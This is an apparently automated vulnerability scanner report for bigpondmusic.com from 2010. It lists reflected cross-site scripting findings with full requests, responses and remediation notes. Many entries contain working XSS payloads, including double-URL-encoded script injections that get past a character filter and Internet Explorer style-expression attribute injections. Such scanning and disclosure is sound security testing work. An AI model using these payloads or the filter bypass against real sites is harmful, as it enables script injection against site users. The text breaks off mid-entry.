GET /album4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1/uriah-heep/the-collection91 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88222
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8ad'%3b2757a09f366 was submitted in the REST URL parameter 1. This input was echoed as 1b8ad';2757a09f366 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album1b8ad'%3b2757a09f366/uriah-heep/the-collection91 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:25:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87833
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 was submitted in the h parameter. This input was echoed as a909e"style="x:expression(alert(1))"8131f1c8632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/uriah-heep/the-collection91?h=624650163a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:25:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 127967
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.151. http://bigpondmusic.com/album/uriah-heep/the-collection91 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/uriah-heep/the-collection91
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc95e"style="x:expression(alert(1))"7a852546fd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/uriah-heep/the-collection91?bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:25:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 127948
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1289'%3be26bc6beb3c was submitted in the REST URL parameter 1. This input was echoed as a1289';e26bc6beb3c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albuma1289'%3be26bc6beb3c/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902 was submitted in the REST URL parameter 1. This input was echoed as 1bc4c"><script>alert(1)</script>852e427d902 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88368
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.154. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe325"style="x:expression(alert(1))"c690ff87c07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:17:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 132595
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Various Artists - He Will Ha ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style="x:expression(alert(1))"c690ff87c07=1" /> ...[SNIP]...
The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 was submitted in the CID parameter. This input was echoed as f8b5a"style="x:expression(alert(1))"bce27fd6229 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:17:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 153503
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Various Artists - So Fresh T ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style="x:expression(alert(1))"bce27fd6229" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ad01'%3be08d6c44f91 was submitted in the REST URL parameter 1. This input was echoed as 7ad01';e08d6c44f91 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album7ad01'%3be08d6c44f91/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88263
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4 was submitted in the REST URL parameter 1. This input was echoed as 754d1"><script>alert(1)</script>4db73f5a8a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:17:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88092
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.158. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bfcd"style="x:expression(alert(1))"22a4ca4833e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:17:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 153233
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Various Artists - So Fresh T ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style="x:expression(alert(1))"22a4ca4833e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1 was submitted in the REST URL parameter 1. This input was echoed as 965ed"><script>alert(1)</script>d0c19fa9bd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1/various-artists/weekend-songs HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88461
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a148'%3b45d6ab478f5 was submitted in the REST URL parameter 1. This input was echoed as 3a148';45d6ab478f5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album3a148'%3b45d6ab478f5/various-artists/weekend-songs HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:18:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88238
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.161. http://bigpondmusic.com/album/various-artists/weekend-songs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/various-artists/weekend-songs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3767"style%3d"x%3aexpression(alert(1))"e545b48a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3767"style="x:expression(alert(1))"e545b48a308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/various-artists/weekend-songs?c3767"style%3d"x%3aexpression(alert(1))"e545b48a308=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 169650
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1081'%3b46a0f08e718 was submitted in the REST URL parameter 1. This input was echoed as e1081';46a0f08e718 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
